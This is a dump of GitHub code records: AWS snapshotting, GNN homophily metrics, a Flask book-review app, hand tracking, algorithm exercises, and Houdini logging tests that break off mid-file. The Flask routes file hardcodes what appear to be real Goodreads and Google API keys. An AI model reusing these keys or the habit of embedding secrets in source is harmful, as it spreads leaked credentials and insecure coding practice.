+{"seq_id":"40259735127","text":"import boto3\nimport schedule\n\nec2_client = boto3.client('ec2')\n\nvolumes = ec2_client.describe_volumes(\n Filters=[\n {\n 'Name': 'tag:Name',\n 'Values': [\n 'prod'\n ]\n }\n ]\n )\n\nfor volume in volumes['Volumes']:\n new_snapshots = ec2_client.create_snapshot(\n VolumeId=volume['VolumeId']\n )\n print(f\"Volume ID: {volume['VolumeId']} Snapshot ID: {new_snapshots['SnapshotId']}\\n\")\n","repo_name":"mohamaddayoub/python-aws","sub_path":"snapshot-specific-volume.py","file_name":"snapshot-specific-volume.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"656535653","text":"import math\nimport random\nimport time\n\nimport numpy as np\nimport scipy\nimport torch\nfrom scipy.stats import ttest_ind\nfrom sklearn import svm\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.naive_bayes import GaussianNB\nfrom torch_scatter import scatter_add\n\nfrom utils.util_funcs import random_disassortative_splits, accuracy\n\npi = math.pi\nif torch.cuda.is_available():\n device = 'cuda:0'\nelse:\n device = 'cpu'\ndevice = torch.device(device)\n\n\ndef remove_self_loops(edge_index, edge_attr=None):\n r\"\"\"Removes every self-loop in the graph given by :attr:`edge_index`, so\n that :math:`(i,i) \\not\\in \\mathcal{E}` for every :math:`i \\in \\mathcal{V}`.\n\n Args:\n edge_index (LongTensor): The edge indices.\n edge_attr (Tensor, optional): Edge weights or multi-dimensional\n edge features. (default: :obj:`None`)\n\n :rtype: (:class:`LongTensor`, :class:`Tensor`)\n \"\"\"\n row, col = edge_index[0], edge_index[1]\n mask = row != col\n edge_attr = edge_attr if edge_attr is None else edge_attr[mask]\n edge_index = edge_index[:, mask]\n\n return edge_index, edge_attr\n\n\ndef edge_homophily(A, labels, ignore_negative=False):\n \"\"\" gives edge homophily, i.e. proportion of edges that are intra-class\n compute homophily of classes in labels vector\n See Zhu et al. 
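# The brain window applied above (center 40 HU, width 80 HU) clamps values to
# [0, 80]; for display or as model input it is common to rescale the clamped
# range to [0, 1]. A hedged helper matching window_image()'s floor-division
# convention:
import numpy as np

def window_normalize(hu, center=40, width=80):
    lo, hi = center - width // 2, center + width // 2
    return (np.clip(hu, lo, hi) - lo) / float(hi - lo)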
2020 \"Beyond Homophily ...\"\n if ignore_negative = True, then only compute for edges where nodes both have\n nonnegative class labels (negative class labels are treated as missing\n \"\"\"\n src_node, targ_node = A.coalesce().indices()[0, :], A.coalesce().indices()[1, :] # A.nonzero()\n matching = labels[src_node] == labels[targ_node]\n labeled_mask = (labels[src_node] >= 0) * (labels[targ_node] >= 0)\n if ignore_negative:\n edge_hom = np.mean(matching[labeled_mask])\n else:\n edge_hom = torch.mean(matching.float())\n return edge_hom\n\n\ndef node_homophily(A, labels):\n \"\"\" average of homophily for each node\n \"\"\"\n src_node = A.coalesce().indices()[0, :]\n targ_node = A.coalesce().indices()[1, :]\n edge_idx = torch.tensor(np.vstack((src_node, targ_node)), dtype=torch.long).contiguous()\n labels = torch.tensor(labels)\n num_nodes = A.shape[0]\n return node_homophily_edge_idx(edge_idx, labels, num_nodes)\n\n\ndef node_homophily_edge_idx(edge_idx, labels, num_nodes):\n \"\"\" edge_idx is 2 x(number edges) \"\"\"\n edge_index = remove_self_loops(edge_idx)[0]\n hs = torch.zeros(num_nodes)\n degs = torch.bincount(edge_index[0, :]).float()\n matches = (labels[edge_index[0, :]] == labels[edge_index[1, :]]).float()\n hs = hs.scatter_add(0, edge_index[0, :], matches) / degs\n return hs[degs != 0].mean()\n\n\ndef compact_matrix_edge_idx(edge_idx, labels):\n \"\"\"\n c x c compatibility matrix, where c is number of classes\n H[i,j] is proportion of endpoints that are class j \n of edges incident to class i nodes \n \"Generalizing GNNs Beyond Homophily\"\n treats negative labels as unlabeled\n \"\"\"\n edge_index = remove_self_loops(edge_idx.to(device))[0]\n src_node, targ_node = edge_index[0, :], edge_index[1, :]\n labeled_nodes = (labels[src_node] >= 0) * (labels[targ_node] >= 0)\n label = labels.squeeze()\n c = label.max() + 1\n H = torch.zeros((c, c)).to(edge_index.to(device))\n src_label = label[src_node[labeled_nodes]]\n targ_label = label[targ_node[labeled_nodes]]\n for k in range(c):\n sum_idx = torch.where(src_label == k)[0]\n add_idx = targ_label[sum_idx]\n scatter_add(torch.ones_like(add_idx).to(H.dtype), add_idx, out=H[k, :], dim=-1)\n H = H / torch.sum(H, axis=1, keepdims=True)\n return H\n\n\ndef our_measure(edge_index, label):\n \"\"\" \n our measure \\hat{h}\n treats negative labels as unlabeled \n \"\"\"\n label = label.squeeze()\n c = label.max() + 1\n H = compact_matrix_edge_idx(edge_index.to(device), label.to(device))\n nonzero_label = label[label >= 0]\n counts = nonzero_label.unique(return_counts=True)[1]\n proportions = counts.float() / nonzero_label.shape[0]\n val = 0\n for k in range(c):\n class_add = torch.clamp(H[k, k] - proportions[k], min=0)\n if not torch.isnan(class_add):\n # only add if not nan\n val += class_add\n val /= c - 1\n return val\n\n\ndef class_distribution(A, labels):\n edge_index = A.coalesce().indices()\n src_node, targ_node = edge_index[0, :], edge_index[1, :]\n deg = src_node.unique(return_counts=True)[1]\n\n # remove self-loop\n deg = deg - 1\n edge_index = remove_self_loops(A.coalesce().indices())[0]\n src_node, targ_node = edge_index[0, :], edge_index[1, :]\n\n labels = labels.squeeze()\n p = labels.unique(return_counts=True)[1] / labels.shape[0]\n p_bar = torch.zeros(labels.max() + 1)\n pc = torch.zeros((labels.max() + 1, labels.max() + 1))\n for i in range(labels.max() + 1):\n p_bar[i] = torch.sum(deg[torch.where(labels == i)])\n\n for j in range(labels.max() + 1):\n pc[i, j] = torch.sum(labels[targ_node[torch.where(labels[src_node] == i)]] 
== j)\n p_bar, pc = p_bar / torch.sum(deg), pc / torch.sum(deg)\n p_bar[torch.where(p_bar == 0)], pc[torch.where(pc == 0)] = 1e-8, 1e-8\n return p, p_bar, pc\n\n\ndef adjusted_homo(A, label):\n p, p_bar, pc = class_distribution(A, label)\n edge_homo = edge_homophily(A, label)\n adj_homo = (edge_homo - torch.sum(p_bar ** 2)) / (1 - torch.sum(p_bar ** 2))\n\n return adj_homo\n\n\ndef label_informativeness(A, label):\n p, p_bar, pc = class_distribution(A, label)\n LI = 2 - torch.sum(pc * torch.log(pc)) / torch.sum(p_bar * torch.log(p_bar))\n return LI\n\n\ndef generalized_edge_homophily(adj, features, label, sample_max=75000, iteration=10):\n nedges = adj.coalesce().indices()[0, :].shape[0]\n if nedges < sample_max:\n sim = torch.tensor(cosine_similarity(features.cpu(), features.cpu())).to(device)\n sim[torch.isnan(sim)] = 0\n adj = adj.to_dense()\n adj = adj - torch.diag(torch.diag(adj))\n adj = (adj > 0).float()\n g_edge_homo = torch.sum(sim * adj) / torch.sum(adj)\n\n return g_edge_homo\n else:\n g_homo = np.zeros(iteration)\n\n for i in range(iteration):\n sample = torch.tensor(\n random.sample(list(np.arange(adj.coalesce().indices()[0, :].shape[0])), int(sample_max)))\n src_node, targ_node = adj.coalesce().indices()[0, :][sample], adj.coalesce().indices()[1, :][sample]\n sim = torch.sum(features[src_node].cpu() * features[targ_node].cpu(), 1) / \\\n (torch.norm(features[src_node].cpu(), dim=1, p=2) *\n torch.norm(features[targ_node].cpu(), dim=1, p=2))\n sim[torch.isnan(sim)] = 0\n g_homo[i] = torch.mean(sim)\n return np.mean(g_homo)\n\n\ndef similarity(features, adj, label, hard=None, LP=1, ifsum=1, idx_train=None):\n if str(type(idx_train)) == '':\n inner_prod = torch.mm(torch.mm(adj, features), torch.mm(adj, features).transpose(0, 1))\n labels = torch.argmax(label, 1)\n weight_matrix = (torch.zeros(adj.clone().detach().size(0), labels.clone().detach().max() + 1))\n else:\n labels = torch.argmax(label, 1)[idx_train]\n label = label[idx_train, :]\n weight_matrix = (torch.zeros(torch.sum(idx_train.int()), labels.clone().detach().max() + 1))\n inner_prod = torch.mm(torch.spmm(adj, features)[idx_train, :],\n torch.spmm(adj, features)[idx_train, :].transpose(0, 1))\n for i in range(labels.max() + 1):\n # Think about using torch.sum or torch.mean\n if ifsum == 1:\n weight_matrix[:, i] = torch.sum(inner_prod[:, labels == i], 1)\n else:\n weight_matrix[:, i] = torch.mean(inner_prod[:, labels == i], 1)\n if hard is None:\n if ifsum == 1:\n nnodes = labels.shape[0]\n degs_label = torch.sum(torch.mm(label, label.transpose(0, 1)), 1)\n else:\n nnodes = labels.max() + 1\n degs_label = 1\n if LP == 1:\n # weight mean\n LAF_ratio = (weight_matrix[np.arange(labels.size(0)), labels] / degs_label) / \\\n ((torch.sum(weight_matrix, 1) - weight_matrix[np.arange(labels.size(0)), labels]) / (\n nnodes - degs_label))\n LAF_ratio[torch.isnan(LAF_ratio)] = 0\n return torch.mean((LAF_ratio >= 1).float()) #\n else:\n return torch.mean(((torch.sum(weight_matrix - weight_matrix * label, 1) <= 0) & (\n torch.sum(weight_matrix * label, 1) >= 0)).float())\n else:\n if LP == 1:\n return torch.mean(torch.argmax(weight_matrix, 1).eq(labels).float())\n else:\n return torch.mean(((torch.max(weight_matrix - weight_matrix * label, 1)[0] <= 0.) 
& (\n torch.sum(weight_matrix * label, 1) >= 0)).float())\n\n\ndef gntk_homophily_(features, adj, sample, n_layers):\n eps = 1e-8\n G_gram = torch.mm(torch.spmm(adj, features)[sample, :],\n torch.transpose(torch.spmm(adj, features)[sample, :], 0, 1))\n G_norm = torch.sqrt(torch.diag(G_gram)).reshape(-1, 1) * torch.sqrt(torch.diag(G_gram)).reshape(1, -1)\n G_norm = (G_norm > eps) * G_norm + eps * (G_norm <= eps)\n if n_layers == 1:\n arccos = torch.acos(torch.div(G_gram, G_norm))\n sqrt = torch.sqrt(torch.square(G_norm) - torch.square(G_gram))\n arccos[torch.isnan(arccos)], sqrt[torch.isnan(sqrt)] = 0, 0\n K_G = 1 / pi * (G_gram * (pi - arccos) + sqrt)\n else:\n K_G = G_gram\n\n gram = torch.mm(features[sample, :], torch.transpose(features[sample, :], 0, 1))\n norm = torch.sqrt(torch.diag(gram)).reshape(-1, 1) * torch.sqrt(torch.diag(gram)).reshape(1, -1)\n norm = (norm > eps) * norm + eps * (norm <= eps)\n if n_layers == 1:\n arccos = torch.acos(torch.div(gram, norm))\n sqrt = torch.sqrt(torch.square(norm) - torch.square(gram))\n arccos[torch.isnan(arccos)], sqrt[torch.isnan(sqrt)] = 0, 0\n K_X = 1 / pi * (gram * (pi - arccos) + sqrt)\n else:\n K_X = gram\n\n return K_G / 2, K_X / 2\n\n\ndef classifier_based_performance_metric(features, adj, labels, sample_max, base_classifier='kernel_reg1', epochs=100):\n nnodes = (labels.shape[0])\n if labels.dim() > 1:\n labels = labels.flatten()\n G_results, X_results, diff_results, G_good_p_results, X_good_p_results = torch.zeros(epochs), torch.zeros(\n epochs), torch.zeros(epochs), torch.zeros(epochs), torch.zeros(epochs)\n t_time = time.time()\n for j in range(epochs):\n\n if nnodes <= sample_max:\n sample = np.arange(nnodes)\n label_onehot = torch.eye(labels.max() + 1)[labels].cpu()\n labels_sample = labels.cpu()\n else:\n sample, _, _ = random_disassortative_splits(labels, labels.max() + 1, sample_max / nnodes)\n label_onehot = torch.eye(labels.max() + 1)[labels][sample, :].cpu()\n labels_sample = labels.cpu()[sample]\n\n idx_train, idx_val, idx_test = random_disassortative_splits(labels_sample, labels_sample.max() + 1)\n idx_val = idx_val + idx_test\n # Kernel Regression based p-values\n if base_classifier in {'kernel_reg0', 'kernel_reg1'}:\n nlayers = 0 if base_classifier == 'kernel_reg0' else 1\n K_graph, K = gntk_homophily_(features, adj, sample, nlayers)\n K_graph_train_train, K_train_train = K_graph[idx_train, :][:, idx_train], K[idx_train, :][:, idx_train]\n K_graph_val_train, K_val_train = K_graph[idx_val, :][:, idx_train], K[idx_val, :][:, idx_train]\n Kreg_G, Kreg_X = K_graph_val_train.cpu() @ (\n torch.tensor(np.linalg.pinv(K_graph_train_train.cpu().numpy())) @ label_onehot.cpu()[\n idx_train]), K_val_train.cpu() @ (\n torch.tensor(np.linalg.pinv(K_train_train.cpu().numpy())) @ label_onehot.cpu()[\n idx_train])\n diff_results[j] = (accuracy(labels_sample[idx_val], Kreg_G) > accuracy(labels_sample[idx_val], Kreg_X))\n G_results[j] = accuracy(labels_sample[idx_val],\n Kreg_G)\n X_results[j] = accuracy(labels_sample[idx_val],\n Kreg_X)\n elif base_classifier == 'gnb':\n # Gaussian Naive Bayes model\n X = features[sample].cpu()\n X_agg = torch.spmm(adj, features)[sample].cpu()\n\n X_gnb, G_gnb = GaussianNB(), GaussianNB()\n X_gnb.fit(X[idx_train], labels_sample[idx_train])\n G_gnb.fit(X_agg[idx_train], labels_sample[idx_train])\n\n X_pred = torch.tensor(X_gnb.predict(X[idx_val]))\n G_pred = torch.tensor(G_gnb.predict(X_agg[idx_val]))\n\n diff_results[j] = (torch.mean(G_pred.eq(labels_sample[idx_val]).float()) > torch.mean(\n 
X_pred.eq(labels_sample[idx_val]).float()))\n G_results[j] = torch.mean(G_pred.eq(labels_sample[idx_val]).float())\n X_results[j] = torch.mean(X_pred.eq(labels_sample[idx_val]).float())\n else:\n # SVM based p-values\n X = features[sample].cpu()\n X_agg = torch.spmm(adj, features)[sample].cpu()\n if base_classifier == 'svm_rbf':\n G_svm = svm.SVC(kernel='rbf', gamma=0.5, C=0.1).fit(X_agg[idx_train], labels_sample[idx_train])\n X_svm = svm.SVC(kernel='rbf', gamma=0.5, C=0.1).fit(X[idx_train], labels_sample[idx_train])\n elif base_classifier == 'svm_poly':\n G_svm = svm.SVC(kernel='poly', degree=3, C=1).fit(X_agg[idx_train], labels_sample[idx_train])\n X_svm = svm.SVC(kernel='poly', degree=3, C=1).fit(X[idx_train], labels_sample[idx_train])\n elif base_classifier == 'svm_linear':\n G_svm = svm.SVC(kernel='linear').fit(X_agg[idx_train], labels_sample[idx_train])\n X_svm = svm.SVC(kernel='linear').fit(X[idx_train], labels_sample[idx_train])\n\n G_pred = torch.tensor(G_svm.predict(X_agg[idx_val]))\n X_pred = torch.tensor(X_svm.predict(X[idx_val]))\n diff_results[j] = (torch.mean(G_pred.eq(labels_sample[idx_val]).float()) > torch.mean(\n X_pred.eq(labels_sample[idx_val]).float()))\n G_results[j] = torch.mean(G_pred.eq(labels_sample[\n idx_val]).float())\n X_results[j] = torch.mean(X_pred.eq(labels_sample[\n idx_val]).float())\n\n if scipy.__version__ == '1.4.1':\n g_aware_good_stats, g_aware_good_p = ttest_ind(X_results.detach().cpu(), G_results.detach().cpu(), axis=0,\n equal_var=False,\n nan_policy='propagate')\n else:\n g_aware_good_stats, g_aware_good_p = ttest_ind(X_results.detach().cpu(), G_results.detach().cpu(), axis=0,\n equal_var=False, nan_policy='propagate')\n\n if torch.mean(diff_results) <= 0.5:\n g_aware_good_p = g_aware_good_p / 2\n\n else:\n g_aware_good_p = 1 - g_aware_good_p / 2\n\n return g_aware_good_p, time.time() - t_time\n","repo_name":"SitaoLuan/When-Do-GNNs-Help","sub_path":"utils/homophily_metrics.py","file_name":"homophily_metrics.py","file_ext":"py","file_size_in_byte":15371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12212033214","text":"import requests\n\nfrom flask import flash, jsonify, make_response, render_template, redirect, request, session, url_for, abort \nfrom application import app, db\nfrom flask_login import current_user, login_required, login_user, logout_user\nfrom forms import * \nfrom models import *\nfrom sqlalchemy import or_, and_, func\nfrom datetime import datetime\nimport json\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index():\n # session.permanent = True\n if current_user.is_authenticated:\n if request.method == 'POST':\n search_input = request.form.get(\"Search\")\n books = Book.query.filter(or_(\n Book.isbn.ilike(\"%\" + search_input + \"%\"),\n Book.title.ilike(\"%\" + search_input + \"%\"),\n Book.author.ilike(\"%\" + search_input + \"%\"))).all()\n if len(books) == 1: \n # if the search_input is an exact match, go directly book page\n book = Book.query.filter(or_(\n func.lower(Book.isbn) == func.lower(search_input),\n func.lower(Book.title) == func.lower(search_input),\n func.lower(Book.author) == func.lower(search_input))).first()\n if book: \n return redirect(url_for('book', isbn=book.isbn))\n # if search_input is not exact match, show list of potential books\n else:\n return render_template('index.html', title='Home', books=books)\n # if no books were found, print error message\n elif len(books) == 
0: \n flash(\"We couldn't find {}. Sorry about that. :<\".format(search_input))\n # if multiple books found, show list of potential books\n else:\n return render_template('index.html', title='Home', books=books)\n return render_template('index.html', title='Home', books=None)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index')) \n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data)\n user.set_password(form.password.data)\n db.add(user)\n db.commit()\n flash(\"Congratulations, you're in {}!\".format(user.username))\n return redirect(url_for('index')) \n return render_template('register.html', title='Register', form=form)\n\n \n@app.route('/login', methods=['GET','POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index')) \n form = LoginForm()\n if form.validate_on_submit():\n # Check if user is in the database\n user = User.query.filter_by(username=form.username.data).first()\n # If user doesn't exist or doesn't match password, error\n if user is None or not user.check_password(form.password.data) :\n flash('Incorrect username or password.')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n return redirect(url_for('index'))\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route('/logout')\n@login_required # precautionary step; shouldn't be necessary though \ndef logout():\n logout_user()\n return redirect(url_for('index')) \n\n\n@app.route('/book/<isbn>', methods=['GET', 'POST']) \n@login_required\ndef book(isbn):\n # find first book that matches requested isbn\n book = Book.query.filter_by(isbn=isbn).first()\n if not book:\n flash('No book!')\n return redirect(url_for('index')) \n\n # create a form to submit book reviews\n form = ReviewForm()\n if form.validate_on_submit():\n # check if this user has a review for this book already\n existing_review = Review.query.filter(and_(Review.user_id == current_user.id,\n Review.book_id == book.id)).first()\n\n # if a review exists already, reject the duplicate\n if existing_review:\n flash(\"You already reviewed this book.\")\n # if review doesn't exist yet, add the new one \n else:\n review = Review(rating=form.rating.data, body=form.body.data,\n date=datetime.utcnow().strftime(\"%m-%d-%Y\"), \n user_id=current_user.id, book_id=book.id)\n db.add(review)\n db.commit()\n flash(\"Thank you for your review!\")\n \n # get summed ratings from bookBook\n ratings_BB = [rev.rating for rev in \n Review.query.filter_by(book_id=book.id).all()] \n sum_ratings_BB = sum(ratings_BB)\n\n # request data for this isbn from goodreads api\n goodreads = requests.get(\"https://www.goodreads.com/book/review_counts.json\", \n params={\"key\": \"wbYVNp1WvHbg0SdF1fCvoA\", \n \"isbns\": isbn})\n\n # check if get request was successful\n if goodreads.status_code != 200:\n raise Exception('ERROR: API request unsuccessful.')\n\n # convert goodreads request to json format and get avg/num ratings on this book \n data_GR = goodreads.json()\n avg_rating_GR = float(data_GR['books'][0]['average_rating'])\n num_ratings_GR = int(data_GR['books'][0]['work_ratings_count'])\n\n # calculate average rating across goodreads and bookBook \n total_ratings = num_ratings_GR + len(ratings_BB)\n avg_rating = round((((avg_rating_GR * num_ratings_GR) + \n sum_ratings_BB)/total_ratings), 2)\n \n # Get book summary from google books API\n google_api = 
requests.get(\"https://www.googleapis.com/books/v1/volumes/?q=\" \n + \"isbn:\" + isbn \n + \"&key=AIzaSyCQq78hfnGQDacarWCJ2qOC_Ec0-eKvcyc\")\n \n if google_api.status_code != 200:\n raise Exception('ERROR: API request unsuccessful.')\n \n data_G = google_api.json()\n\n # check if the google api has the book description\n if ('items' not in data_G \n or 'volumeInfo' not in data_G['items'][0] \n or 'description' not in data_G['items'][0]['volumeInfo']):\n summary = \"No summary available.\"\n # if the description exists, extract it \n else: \n summary = data_G['items'][0]['volumeInfo']['description'] \n\n return render_template('book.html', book=book, reviews=book.reviews[::-1],\n form=form, rating=avg_rating, num_ratings=total_ratings, summary=summary)\n\n\n# method for api access\n@app.route('/api/<isbn>')\ndef access(isbn):\n\n # find first book that matches requested isbn\n book = Book.query.filter_by(isbn=isbn).first()\n if not book:\n return jsonify({\"error\": \"invalid isbn\"}), 404\n\n # get summed ratings from bookBook\n ratings_BB = [rev.rating for rev in \n Review.query.filter_by(book_id=book.id).all()] \n sum_ratings_BB = sum(ratings_BB)\n\n # request data for this isbn from goodreads api\n goodreads = requests.get(\"https://www.goodreads.com/book/review_counts.json\", \n params={\"key\": \"wbYVNp1WvHbg0SdF1fCvoA\", \n \"isbns\": isbn})\n\n # check if get request was successful\n if goodreads.status_code != 200:\n raise Exception('ERROR: API request unsuccessful.')\n\n # convert goodreads request to json format and get avg/num ratings on this book \n data_GR = goodreads.json()\n avg_rating_GR = float(data_GR['books'][0]['average_rating'])\n num_ratings_GR = int(data_GR['books'][0]['work_ratings_count'])\n\n # calculate average rating across goodreads and bookBook \n total_ratings = num_ratings_GR + len(ratings_BB)\n avg_rating = round((((avg_rating_GR * num_ratings_GR) + \n sum_ratings_BB)/total_ratings), 2)\n return jsonify({\n \"title\": book.title,\n \"author\": book.author,\n \"year\": book.year,\n \"book\": isbn,\n \"review_count\": total_ratings,\n \"average_score\": avg_rating})\n\n\n@app.route('/user/<username>')\n@login_required\ndef user(username):\n user = User.query.filter_by(username=username).first()\n if not user:\n abort(404)\n return render_template('user.html', user=user, reviews=user.reviews)\n","repo_name":"e2nguyen/bookBook","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} {"seq_id":"31113463438","text":"import cv2\nimport mediapipe as mp\nimport random\nfrom hand_meaning import hand_pos, hand_angle\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\ncap = cv2.VideoCapture(0)\nw, h = 640, 480\n\nwhile True:\n \n ret, frame = cap.read()\n frame = cv2.resize(frame, (w,h))\n with mp_hands.Hands(\n static_image_mode=False,\n max_num_hands=2,\n min_detection_confidence=0.5) as hands:\n frame= cv2.flip(frame,1)\n results = hands.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n if(results.multi_hand_landmarks == None): # for protection\n print(\"no hand\")\n cv2.imshow('frame', frame)\n key = cv2.waitKey(1)\n if(key==27):\n break\n else :\n for hand_landmarks in results.multi_hand_landmarks: \n showPoint = mp_hands.HandLandmark.INDEX_FINGER_TIP\n xPoint = hand_landmarks.landmark[showPoint].x * w\n yPoint = hand_landmarks.landmark[showPoint].y * h\n frame = cv2.circle(frame, 
(int(xPoint),int(yPoint)), 5, (255,0,0), -1)\n cv2.imshow('frame', frame)\n key = cv2.waitKey(1)\n if(key==27):\n break\n \n ","repo_name":"JuFengWu/image_process","sub_path":"mediapipe/hand/streaming_finger_point.py","file_name":"streaming_finger_point.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15309342249","text":"import os\nimport re\n\n\ndef newest_sample(template: str, ext: str = \".jpg\", cur_dir=\".\", zf: int = 4, c: int = 0):\n flist = [i for i in os.listdir(cur_dir) if i.endswith(ext)]\n c = 0\n for i in flist:\n res = re.match(template, i)\n if res:\n res = res.groups()[0]\n zf = len(res)\n c = max(c, int(res))\n return c, zf\n\ndef ensure_path(path: str, is_dir: bool = True):\n try:\n if is_dir:\n os.makedirs(path)\n else:\n return os.path.isfile(path)\n except OSError:\n if is_dir and os.path.isfile(path):\n raise\n\n\ndef validate_dataset(path: str):\n ensure_path(path)\n file_list = [fn.split(\".\")[-1] for fn in os.listdir(path)]\n return \"names\" in file_list\n","repo_name":"Jecosine/allib","sub_path":"allib/utils/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"69869850981","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n charFreq = {} # Keep track of the count of every character in the pattern we are trying to match\n for char in t:\n if char not in charFreq:\n charFreq[char] = 0\n charFreq[char] += 1\n \n matched = 0 # Keep track of all the characters we have fully matched\n minStart = 0 # Keep track of the start of the smallest substring/window\n minLength = float('inf') # Keep track of the minimum window/substring length\n windowStart = 0\n \n for windowEnd in range(len(s)):\n char = s[windowEnd] # Current character\n \n if char in charFreq:\n charFreq[char] -= 1\n \n if charFreq[char] == 0:\n matched += 1\n \n while matched == len(charFreq):\n windowSize = windowEnd - windowStart + 1 # Current window size\n if windowSize < minLength:\n minLength = windowSize\n minStart = windowStart\n \n remove = s[windowStart] # The character we are going to remove from the window\n \n if remove in charFreq:\n # If we are removing the last instance of this character from our window\n if charFreq[remove] == 0:\n matched -= 1 # Decrement matched since we have 1 less matched character now\n charFreq[remove] += 1 # Add that character back into the charFreq hashmap\n windowStart += 1 # Increment windowStart to shrink the window\n \n if minLength == float('inf'):\n return \"\"\n return s[minStart: minStart + minLength]","repo_name":"Vamsi995/LeetCode-Python","sub_path":"0076-minimum-window-substring/0076-minimum-window-substring.py","file_name":"0076-minimum-window-substring.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29398303297","text":"def solution(fees,records):\n\tpark_log = dict()\n\tfor record in records:\n\t\ttime,num,state = record.split()\n\t\ttime = int(time[:2]) * 60 + int(time[3:5])\n\t\tif num not in park_log:\n\t\t\tpark_log[num] = []\n\t\tpark_log[num].append(time)\n\n\tcarlist = sorted(park_log.keys())\n\tanswer = []\n\n\tfor number in carlist:\n\t\ttotal = 0\n\t\tif len(park_log[number]) % 2 == 1:\n\t\t\tpark_log[number].append(23*60+59)\n\t\tfor i in range(0,len(park_log[number]),2):\n\t\t\ttotal += 
park_log[number][i+1]-park_log[number][i]\n\t\tif total <= fees[0]:\n\t\t\tanswer.append(fees[1])\n\t\telse:\n\t\t\tprice = fees[1]\n\t\t\ttotal -= fees[0]\n\t\t\tprice += (total // fees[2]) * fees[3]\n\t\t\tif total % fees[2] != 0:\n\t\t\t\tprice += fees[3]\n\t\t\tanswer.append(price)\n\n\treturn answer\n\nif __name__ == \"__main__\":\n\tprint(solution([120, 0, 60, 591],[\"16:00 3961 IN\", \"16:00 0202 IN\", \"18:00 3961 OUT\", \"18:00 0202 OUT\", \"23:58 3961 IN\"]))","repo_name":"ZScomnet/Programmers","sub_path":"kakao/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14459719083","text":"\"\"\"Tests for houdini_toolbox.logging.adapters module.\"\"\"\n\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\n# Standard Library\nimport logging\n\n# Third Party\nimport pytest\n\n# Houdini Toolbox\nimport houdini_toolbox.logging.adapters\n\n# Houdini\nimport hou\n\n# =============================================================================\n# FIXTURES\n# =============================================================================\n\n\n@pytest.fixture\ndef test_adapter():\n \"\"\"Fixture to provide a minimally set up HoudiniLoggerAdapter.\"\"\"\n logger = logging.getLogger(\"test_logger\")\n\n adapter = houdini_toolbox.logging.adapters.HoudiniLoggerAdapter(logger)\n\n yield adapter\n\n\n# =============================================================================\n# TESTS\n# =============================================================================\n\n\nclass Test_HoudiniLoggerAdapter:\n \"\"\"Test houdini_toolbox.logging.adapters.HoudiniLoggerAdapter.\"\"\"\n\n def test___init__(self, mocker):\n \"\"\"Test object initialization.\"\"\"\n test_logger = logging.getLogger(\"test_logger\")\n extra = {\"extra\": \"value\"}\n\n mock_dialog = mocker.MagicMock(spec=bool)\n mock_node = mocker.MagicMock(spec=hou.Node)\n mock_status_bar = mocker.MagicMock(spec=bool)\n\n log = houdini_toolbox.logging.adapters.HoudiniLoggerAdapter(\n test_logger, mock_node, mock_dialog, mock_status_bar, extra=extra\n )\n\n assert log.logger == test_logger\n assert log.extra == extra\n\n assert log._dialog == mock_dialog\n assert log._node == mock_node\n assert log._status_bar == mock_status_bar\n\n def test_from_name(self):\n \"\"\"Test HoudiniLoggerAdapter.from_name().\"\"\"\n result = houdini_toolbox.logging.adapters.HoudiniLoggerAdapter.from_name(\n \"test_name\"\n )\n\n assert result.logger.name == \"test_name\"\n\n result = houdini_toolbox.logging.adapters.HoudiniLoggerAdapter.from_name(\n \"test_name\",\n node=hou.node(\"/obj\"),\n dialog=True,\n status_bar=True,\n extra={\"foo\": \"bar\"},\n )\n\n assert result.logger.name == \"test_name\"\n assert result.node == hou.node(\"/obj\")\n assert result.dialog\n assert result.status_bar\n assert result.extra == {\"foo\": \"bar\"}\n\n # Properties\n\n def test_dialog(self, test_adapter):\n \"\"\"Test HoudiniLoggerAdapter.dialog.\"\"\"\n assert not test_adapter.dialog\n\n test_adapter.dialog = True\n assert test_adapter._dialog\n\n def test_node(self, test_adapter):\n \"\"\"Test HoudiniLoggerAdapter.node.\"\"\"\n assert test_adapter.node is None\n\n test_node = hou.node(\"/obj\")\n test_adapter.node = test_node\n assert test_adapter._node == test_node\n\n def test_status_bar(self, test_adapter):\n \"\"\"Test 
